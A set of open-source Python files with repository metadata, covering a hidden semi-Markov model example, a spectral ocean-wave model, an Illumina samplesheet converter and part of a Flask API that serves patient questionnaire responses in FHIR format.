posteriormodel = pyhsmm.models.WeakLimitHDPHSMM(
        alpha=6.,gamma=6., # these can matter; see concentration-resampling.py
        init_state_concentration=6., # pretty inconsequential
        obs_distns=obs_distns,
        dur_distns=dur_distns)
posteriormodel.add_data(data,trunc=60) # duration truncation speeds things up when it's possible

# Run the Gibbs sampler, keeping a snapshot of the model every 10 sweeps.
models = []
for idx in progprint_xrange(150):
    posteriormodel.resample_model()
    if (idx+1) % 10 == 0:
        models.append(copy.deepcopy(posteriormodel))

# Plot each snapshot (optionally saving a frame per snapshot).
fig = plt.figure()
for idx, model in enumerate(models):
    plt.clf()
    model.plot()
    plt.gcf().suptitle('HDP-HSMM sampled after %d iterations' % (10*(idx+1)))
    if SAVE_FIGURES:
        plt.savefig('iter_%.3d.png' % (10*(idx+1)))
plt.show()
|
bikash/pyhsmm
|
examples/hsmm.py
|
Python
|
mit
| 1,985
|
[
"Gaussian"
] |
47fbfe1d6ae3178877d2b92b1769e5856d49b16c3417061621f27a78d3a41095
|
import numpy as np
import time
from ..doublyPeriodic import doublyPeriodicModel
from numpy import pi
class model(doublyPeriodicModel):
    """Doubly-periodic spectral model coupling two-dimensional vorticity
    dynamics with the linearized near-inertial (YBJ) wave equation.

    Prognostic variables (nVars = 2): mean vorticity ``q`` (slot 0 of the
    spectral solution array) and complex wave amplitude ``A`` (slot 1).
    Grid arrays (``KK``, ``LL``, ``XX``, ``YY``, ...) and transforms
    (``fft2``/``ifft2``) are provided by the doublyPeriodicModel
    super-class.
    """

    def __init__(self, name = None,
            # Grid parameters
            nx = 256, ny = None, Lx = 1e6, Ly = None,
            # Solver parameters
            t = 0.0,
            dt = 1.0,                       # Numerical timestep
            step = 0,
            timeStepper = "RK4",            # Time-stepping method
            nThreads = 1,                   # Number of threads for FFTW
            useFilter = False,
            #
            # Near-inertial equation params: rotating and gravitating Earth
            f0 = 1.0,
            kappa = 64.0,
            # Friction: hyperviscosity (order set by *ViscOrder below)
            waveVisc = 1.0e-4,
            waveViscOrder = 2.0,
            meanVisc = 1.0e-4,
            meanViscOrder = 2.0,
        ):
        # Physical parameters specific to the Physical Problem
        self.f0 = f0
        self.kappa = kappa
        self.meanVisc = meanVisc
        self.meanViscOrder = meanViscOrder
        self.waveVisc = waveVisc
        self.waveViscOrder = waveViscOrder

        # Initialize super-class.
        doublyPeriodicModel.__init__(self, name = name,
            physics = "two-dimensional turbulence and the" + \
                " near-inertial wave equation",
            nVars = 2,
            realVars = False,
            # Persistent doublyPeriodic initialization arguments
            nx = nx, ny = ny, Lx = Lx, Ly = Ly, t = t, dt = dt, step = step,
            timeStepper = timeStepper, nThreads = nThreads, useFilter = useFilter,
        )

        ## Default vorticity initial condition: Gaussian vortex
        rVortex = self.Lx/20
        q0 = 0.1*self.f0 * np.exp( \
            - ( (self.XX-self.Lx/2.0)**2.0 + (self.YY-self.Ly/2.0)**2.0 ) \
            / (2*rVortex**2.0) \
        )
        self.set_q(q0)

        # Default wave initial condition: uniform velocity.
        A0 = np.ones(self.physVarShape)
        self.set_A(A0)

    # Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def describe_physics(self):
        """Print a short description of the governing equations."""
        print("""
            This model solves the linearized near-inertial wave equation, also \n
            known as the YBJ equation, and the \n
            two-dimensional vorticity equation simulataneously. \n
            Arbitrary-order hyperdissipation can be specified for both. \n
            There are two prognostic variables: wave amplitude, and mean vorticity.
        """)

    def _set_linear_coeff(self):
        """ Calculate the coefficient that multiplies the linear left hand
            side of the equation """
        # Slot 0 (vorticity): hyperviscous dissipation only.
        self.linearCoeff[:, :, 0] = -self.meanVisc \
            * (self.KK**2.0 + self.LL**2.0)**(self.meanViscOrder/2.0)

        # Slot 1 (wave amplitude): hyperviscous dissipation plus the
        # imaginary YBJ dispersion term.
        waveDissipation = -self.waveVisc \
            * (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
        waveDispersion = -1j*self.f0/(2.0*self.kappa**2.0) \
            * ( self.KK**2.0 + self.LL**2.0)
        self.linearCoeff[:, :, 1] = waveDissipation + waveDispersion

    def _calc_right_hand_side(self, soln, t):
        """ Calculate the nonlinear right hand side of PDE """
        # Views for clarity:
        qh = soln[:, :, 0]
        Ah = soln[:, :, 1]

        # Physical-space things (q is real; A stays complex)
        self.q = np.real(self.ifft2(qh))
        self.A = self.ifft2(Ah)

        # Calculate streamfunction (divideSafeKay2 avoids the k=0 mode)
        self.psih = -qh / self.divideSafeKay2

        # Mean velocities from the streamfunction
        self.U = -np.real(self.ifft2(self.jLL*self.psih))
        self.V = np.real(self.ifft2(self.jKK*self.psih))

        # Views to clarify calculation of A's RHS
        U = self.U
        V = self.V
        q = self.q
        A = self.A

        # Right hand side for q: advection of vorticity by (U, V)
        self.RHS[:, :, 0] = -self.jKK*self.fft2(U*q) - self.jLL*self.fft2(V*q)

        # Right hand side for A: advection plus the -i q A / 2 coupling
        # to the mean vorticity.
        self.RHS[:, :, 1] = -self.jKK*self.fft2(U*A) - self.jLL*self.fft2(V*A) \
            -1j/2.0*self.fft2(q*A)

        self._dealias_RHS()

    def _init_problem_parameters(self):
        """ Pre-allocate parameters in memory in addition to the solution """
        # Divide-safe square wavenumber: the (0, 0) mode is set to Inf so
        # dividing by it yields 0 instead of a ZeroDivisionError/NaN warning.
        self.divideSafeKay2 = self.KK**2.0 + self.LL**2.0
        self.divideSafeKay2[0, 0] = float('Inf')

        # Vorticity (real) and wave-field amplitude (complex)
        self.q = np.zeros(self.physVarShape, np.dtype('float64'))
        self.A = np.zeros(self.physVarShape, np.dtype('complex128'))

        # Streamfunction transform
        self.psih = np.zeros(self.specVarShape, np.dtype('complex128'))

        # Mean and wave velocity components
        self.U = np.zeros(self.physVarShape, np.dtype('float64'))
        self.V = np.zeros(self.physVarShape, np.dtype('float64'))

    def update_state_variables(self):
        """ Update diagnostic variables to current model state """
        # Views for clarity:
        qh = self.soln[:, :, 0]
        Ah = self.soln[:, :, 1]

        # Streamfunction
        self.psih = - qh / self.divideSafeKay2

        # Physical-space PV and velocity components
        self.q = np.real(self.ifft2(qh))
        self.A = self.ifft2(Ah)
        self.U = -np.real(self.ifft2(self.jLL*self.psih))
        self.V = np.real(self.ifft2(self.jKK*self.psih))

    def set_q(self, q):
        """ Set model vorticity """
        self.soln[:, :, 0] = self.fft2(q)
        self.soln = self._dealias_array(self.soln)
        self.update_state_variables()

    def set_A(self, A):
        """ Set model wave field amplitude"""
        self.soln[:, :, 1] = self.fft2(A)
        self.soln = self._dealias_array(self.soln)
        self.update_state_variables()

    def plot_current_state(self):
        """ Create a simple plot that shows the state of the model."""
        # Figure out how to do this efficiently.
        import matplotlib.pyplot as plt
        self.update_state_variables()

        # Initialize colorbar dictionary
        colorbarProperties = {
            'orientation' : 'vertical',
            'shrink'      : 0.8,
            'extend'      : 'neither',
        }

        self.fig = plt.figure('Hydrostatic wave equation',
            figsize=(8, 4))

        ax1 = plt.subplot(121)
        plt.pcolormesh(self.xx, self.yy, self.q, cmap='RdBu_r')
        plt.axis('square')

        ax2 = plt.subplot(122)
        # NOTE(review): self.uu and self.vv are never assigned in this
        # class (only self.U/self.V are); unless the super-class defines
        # them this raises AttributeError — confirm against
        # doublyPeriodicModel.
        plt.pcolormesh(self.xx, self.yy, np.sqrt(self.uu**2.0+self.vv**2.0))
        plt.axis('square')

    def describe_model(self):
        """ Describe the current model state """
        print("\nThis is a doubly-periodic spectral model for \n" + \
                "{:s} \n".format(self.physics) + \
                "with the following attributes:\n\n" + \
                "   Domain       : {:.2e} X {:.2e} m\n".format(self.Lx, self.Ly) + \
                "   Resolution   : {:d} X {:d}\n".format(self.nx, self.ny) + \
                "   Timestep     : {:.2e} s\n".format(self.dt) + \
                "   Current time : {:.2e} s\n\n".format(self.t) + \
                "The FFT scheme uses {:d} thread(s).\n".format(self.nThreads))
|
glwagner/py2Periodic
|
py2Periodic/physics/nearInertialWaves_xy.py
|
Python
|
mit
| 7,349
|
[
"Gaussian"
] |
4543f52e3e7bf17ab4f2c6d06c215beedd23350a2fd21b10c3e9e795ff556183
|
"""Converts Illumina SampleSheet CSV files to the run_info.yaml input file.
This allows running the analysis pipeline without Galaxy, using CSV input
files from Illumina SampleSheet or Genesifter.
"""
import os
import csv
import itertools
import difflib
import glob
import yaml
from bcbio.illumina import flowcell
from bcbio import utils
# ## Create samplesheets
def from_flowcell(run_folder, lane_details, out_dir=None):
    """Convert a flowcell into a samplesheet for demultiplexing.
    """
    # The CSV is named after the flowcell directory, written alongside it
    # unless an explicit output directory is given.
    fcid = os.path.basename(run_folder)
    target_dir = out_dir if out_dir is not None else run_folder
    out_file = os.path.join(target_dir, "%s.csv" % fcid)
    header = ["FCID", "Lane", "Sample_ID", "SampleRef", "Index",
              "Description", "Control", "Recipe", "Operator", "SampleProject"]
    with open(out_file, "w") as out_handle:
        writer = csv.writer(out_handle)
        writer.writerow(header)
        writer.writerows(_lane_detail_to_ss(fcid, ldetail)
                         for ldetail in lane_details)
    return out_file
def _lane_detail_to_ss(fcid, ldetail):
"""Convert information about a lane into Illumina samplesheet output.
"""
return [fcid, ldetail["lane"], ldetail["name"], ldetail["genome_build"],
ldetail["bc_index"], ldetail["description"], "N", "", "",
ldetail["project_name"]]
# ## Use samplesheets to create YAML files
def _organize_lanes(info_iter, barcode_ids):
    """Organize flat lane information into nested YAML structure.

    ``info_iter`` yields (fcid, lane, sample_id, genome_build, barcode)
    tuples (see ``_read_input_csv``); ``barcode_ids`` maps a barcode
    sequence to a (barcode_type, barcode_id) pair.
    Returns a list of per-lane dicts suitable for YAML serialization.
    """
    all_lanes = []
    # NOTE(review): the grouping key repeats x[1], so entries are effectively
    # grouped by (fcid, lane) only, even though the unpacked name 'sampleref'
    # suggests the third key element was meant to be x[3] — confirm intent.
    # groupby assumes info_iter is already ordered by this key.
    for (fcid, lane, sampleref), info in itertools.groupby(info_iter, lambda x: (x[0], x[1], x[1])):
        info = list(info)
        cur_lane = dict(flowcell_id=fcid, lane=lane, genome_build=info[0][3], analysis="Standard")
        if not _has_barcode(info):
            # NOTE(review): info[0][1] is the lane field; presumably the
            # sample name (info[0][2]) was intended as description — verify.
            cur_lane["description"] = info[0][1]
        else: # barcoded sample
            cur_lane["description"] = "Barcoded lane %s" % lane
            multiplex = []
            # One multiplex entry per barcoded sample in the lane
            for (_, _, sample_id, _, bc_seq) in info:
                bc_type, bc_id = barcode_ids[bc_seq]
                multiplex.append(dict(barcode_type=bc_type,
                                      barcode_id=bc_id,
                                      sequence=bc_seq,
                                      name=sample_id))
            cur_lane["multiplex"] = multiplex
        all_lanes.append(cur_lane)
    return all_lanes
def _has_barcode(sample):
if sample[0][4]:
return True
def _generate_barcode_ids(info_iter):
"""Create unique barcode IDs assigned to sequences
"""
bc_type = "SampleSheet"
barcodes = list(set([x[-1] for x in info_iter]))
barcodes.sort()
barcode_ids = {}
for i, bc in enumerate(barcodes):
barcode_ids[bc] = (bc_type, i+1)
return barcode_ids
def _read_input_csv(in_file):
"""Parse useful details from SampleSheet CSV file.
"""
with open(in_file, "rU") as in_handle:
reader = csv.reader(in_handle)
reader.next() # header
for line in reader:
if line: # empty lines
(fc_id, lane, sample_id, genome, barcode) = line[:5]
yield fc_id, lane, sample_id, genome, barcode
def _get_flowcell_id(in_file, require_single=True):
    """Retrieve the unique flowcell id represented in the SampleSheet.

    Returns the set of flowcell ids found; raises ValueError when
    ``require_single`` is set and more than one id is present.
    """
    fc_ids = {row[0] for row in _read_input_csv(in_file)}
    if require_single and len(fc_ids) > 1:
        raise ValueError("There are several FCIDs in the same samplesheet file: %s" % in_file)
    return fc_ids
def csv2yaml(in_file, out_file=None):
    """Convert a CSV SampleSheet to YAML run_info format.
    """
    # Default output name: same base as the input with a .yaml extension
    if out_file is None:
        base, _ = os.path.splitext(in_file)
        out_file = "%s.yaml" % base
    bc_ids = _generate_barcode_ids(_read_input_csv(in_file))
    lanes = _organize_lanes(_read_input_csv(in_file), bc_ids)
    with open(out_file, "w") as out_handle:
        out_handle.write(yaml.safe_dump(lanes, default_flow_style=False))
    return out_file
def run_has_samplesheet(fc_dir, config, require_single=True):
    """Checks if there's a suitable SampleSheet.csv present for the run

    Scans every configured ``samplesheet_directories`` entry for CSV files,
    collects the flowcell ids they describe, then fuzzy-matches the run's
    flowcell name against them. Returns the path to the matching samplesheet
    or None when no close match exists.
    """
    fc_name, _ = flowcell.parse_dirname(fc_dir)
    sheet_dirs = config.get("samplesheet_directories", [])
    fcid_sheet = {}
    for ss_dir in (s for s in sheet_dirs if os.path.exists(s)):
        with utils.chdir(ss_dir):
            for ss in glob.glob("*.csv"):
                fc_ids = _get_flowcell_id(ss, require_single)
                for fcid in fc_ids:
                    if fcid:
                        fcid_sheet[fcid] = os.path.join(ss_dir, ss)
    # difflib handles human errors while entering data on the SampleSheet.
    # Only one best candidate is returned (if any). 0.85 cutoff allows for
    # maximum of 2 mismatches in fcid
    potential_fcids = difflib.get_close_matches(fc_name, fcid_sheet.keys(), 1, 0.85)
    # Fixed for Python 3: dict.has_key() was removed; the `in` membership
    # test is equivalent on both Python 2 and 3.
    if len(potential_fcids) > 0 and potential_fcids[0] in fcid_sheet:
        return fcid_sheet[potential_fcids[0]]
    else:
        return None
|
Cyberbio-Lab/bcbio-nextgen
|
bcbio/illumina/samplesheet.py
|
Python
|
mit
| 5,032
|
[
"Galaxy"
] |
b632e6f3ed87c30c3fbc1d0875955e5983978b673a38a984d4e54667eb06d52b
|
"""Assessment Engine API view functions"""
from datetime import datetime
from flask import (
Blueprint,
abort,
current_app,
flash,
jsonify,
make_response,
redirect,
request,
session,
url_for,
)
from flask_babel import gettext as _
from flask_user import roles_required
from urllib.parse import quote
import jsonschema
import requests
from ..audit import auditable_event
from ..database import db
from ..date_tools import FHIR_datetime
from ..extensions import oauth
from ..models.client import validate_origin
from ..models.encounter import EC
from ..models.fhir import bundle_results
from ..models.identifier import Identifier
from ..models.intervention import INTERVENTION
from ..models.qb_timeline import invalidate_users_QBT
from ..models.questionnaire import Questionnaire
from ..models.questionnaire_response import (
NoFutureDates,
QuestionnaireResponse,
)
from ..models.research_study import (
ResearchStudy,
research_study_id_from_questionnaire,
)
from ..models.role import ROLE
from ..models.user import current_user, get_user
from ..timeout_lock import LockTimeout, guarded_task_launch
from .crossdomain import crossdomain
assessment_engine_api = Blueprint('assessment_engine_api', __name__)
@assessment_engine_api.route(
'/api/patient/<int:patient_id>/assessment',
defaults={'instrument_id': None},
)
@assessment_engine_api.route(
'/api/patient/<int:patient_id>/assessment/<string:instrument_id>'
)
@crossdomain()
@oauth.require_oauth()
def assessment(patient_id, instrument_id):
"""Return a patient's responses to questionnaire(s)
Retrieve a minimal FHIR doc in JSON format including the
'QuestionnaireResponse' resource type. If 'instrument_id'
is excluded, the patient's QuestionnaireResponses for all
instruments are returned.
---
operationId: getQuestionnaireResponse
tags:
- Assessment Engine
produces:
- application/json
parameters:
- name: patient_id
in: path
description: TrueNTH patient ID
required: true
type: integer
format: int64
- name: instrument_id
in: path
description:
ID of the instrument, eg "epic26", "eq5d"
required: true
type: string
enum:
- epic26
- eq5d
- name: patch_dstu2
in: query
description: whether or not to make bundles DTSU2 compliant
required: false
type: boolean
default: false
responses:
200:
description: successful operation
schema:
id: assessment_bundle
required:
- type
properties:
type:
description:
Indicates the purpose of this bundle- how it was
intended to be used.
type: string
enum:
- document
- message
- transaction
- transaction-response
- batch
- batch-response
- history
- searchset
- collection
link:
description:
A series of links that provide context to this bundle.
items:
properties:
relation:
description:
A name which details the functional use for
this link - see [[http://www.iana.org/assignments/link-relations/link-relations.xhtml]].
url:
description: The reference details for the link.
total:
description:
If a set of search matches, this is the total number of
matches for the search (as opposed to the number of
results in this bundle).
type: integer
entry:
type: array
items:
$ref: "#/definitions/QuestionnaireResponse"
example:
entry:
- resourceType: QuestionnaireResponse
authored: '2016-01-22T20:32:17Z'
status: completed
identifier:
value: '101.0'
use: official
label: cPRO survey session ID
subject:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
author:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
source:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
group:
question:
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.1.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.1
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.2.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.2
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.3.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.3
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.4.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.4
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.5.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.5
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.6.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.6
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.7.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.7
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.8.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.8
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.9.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.9
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.10.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.10
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.11.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.11
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.12.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.12
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.13.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.13
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.14.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.14
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.15.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.15
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.16.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.16
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.17.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.17
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.18.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.18
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.19.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.19
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.20.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.20
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.21.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.21
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.22.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.22
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.23.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.23
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.24.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.24
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.25.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.25
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.26.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.26
questionnaire:
display: EPIC 26 Short Form
reference: https://stg.us.truenth.org/api/questionnaires/epic26
- resourceType: QuestionnaireResponse
authored: '2016-03-11T23:47:28Z'
status: completed
identifier:
value: '119.0'
use: official
label: cPRO survey session ID
subject:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
author:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
source:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
group:
question:
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.1.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.1
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.2.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.2
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.3.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.3
- answer: []
linkId: epic26.4
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.5.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.5
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.6.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.6
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.7.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.7
- answer: []
linkId: epic26.8
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.9.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.9
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.10.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.10
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.11.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.11
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.12.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.12
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.13.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.13
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.14.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.14
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.15.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.15
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.16.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.16
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.17.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.17
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.18.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.18
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.19.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.19
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.20.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.20
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.21.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.21
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.22.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.22
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.23.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.23
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.24.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.24
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.25.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.25
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.26.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.26
questionnaire:
display: EPIC 26 Short Form
reference: https://stg.us.truenth.org/api/questionnaires/epic26
link:
href: https://stg.us.truenth.org/api/patient/10015/assessment/epic26
rel: self
resourceType: Bundle
total: 2
type: searchset
updated: '2016-03-14T20:47:26.282263Z'
401:
description:
if missing valid OAuth token or logged-in user lacks permission
to view requested patient
security:
- ServiceToken: []
"""
patient = get_user(
patient_id, 'view', allow_on_url_authenticated_encounters=True)
questionnaire_responses = QuestionnaireResponse.query.filter_by(
subject_id=patient.id).order_by(
QuestionnaireResponse.document['authored'].desc())
instrument_id = request.args.get('instrument_id', instrument_id)
if instrument_id is not None:
questionnaire_responses = questionnaire_responses.filter(
QuestionnaireResponse.document[
("questionnaire", "reference")
].astext.endswith(instrument_id)
)
documents = []
for qnr in questionnaire_responses:
# NB, document_answered returns a (potentially) modified *copy* of
# the document, so changes aren't persisted or found in db session
# cached objects. see TN-2417 for example side-effects
document = qnr.document_answered
for question in document['group']['question']:
for answer in question['answer']:
# Hack: Extensions should be a list, correct in-place if need be
# todo: migrate towards FHIR spec in persisted data
if (
'extension' in answer.get('valueCoding', {}) and
not isinstance(answer['valueCoding']['extension'], (tuple, list))
):
answer['valueCoding']['extension'] = [answer['valueCoding']['extension']]
# Hack: add missing "resource" wrapper for DTSU2 compliance
# Remove when all interventions compliant
if request.args.get('patch_dstu2'):
document = {
'resource': document,
'fullUrl': request.url,
}
# No place within the FHIR spec to associate 'visit name' nor a
# 'status' as per business rules (i.e. 'in-progress' becomes
# 'partially completed' once the associated QB expires).
# Use FHIR `extension`s to pass these fields to clients.
extensions = qnr.extensions()
if extensions:
assert('extension' not in qnr.document) # catch future collisions
document['extension'] = extensions
documents.append(document)
link = {'rel': 'self', 'href': request.url}
return jsonify(bundle_results(elements=documents, links=[link]))
@assessment_engine_api.route(
    '/api/patient/<int:patient_id>/questionnaire_response/<int:qnr_id>'
)
@crossdomain()
@oauth.require_oauth()
def get_qnr_by_id(patient_id, qnr_id):
    """Return the patient's requested questionnaire_response
    Retrieve a minimal FHIR doc in JSON format including the
    'QuestionnaireResponse' resource type.
    ---
    operationId: getQuestionnaireResponseById
    tags:
      - Assessment Engine
    produces:
      - application/json
    parameters:
      - name: patient_id
        in: path
        description: TrueNTH patient ID
        required: true
        type: integer
        format: int64
      - name: qnr_id
        in: path
        description:
          ID (primary key) of the requested Questionnaire Response
        required: true
        type: integer
        format: int64
      - name: patch_dstu2
        in: query
        description: whether or not to make bundles DSTU2 compliant
        required: false
        type: boolean
        default: false
    responses:
      200:
        description: successful operation
        schema:
          $ref: "#/definitions/QuestionnaireResponse"
      401:
        description:
          if missing valid OAuth token or logged-in user lacks permission
          to view requested patient
    security:
      - ServiceToken: []
    """
    # Raises 401/404 via get_user if the current user may not view patient
    patient = get_user(
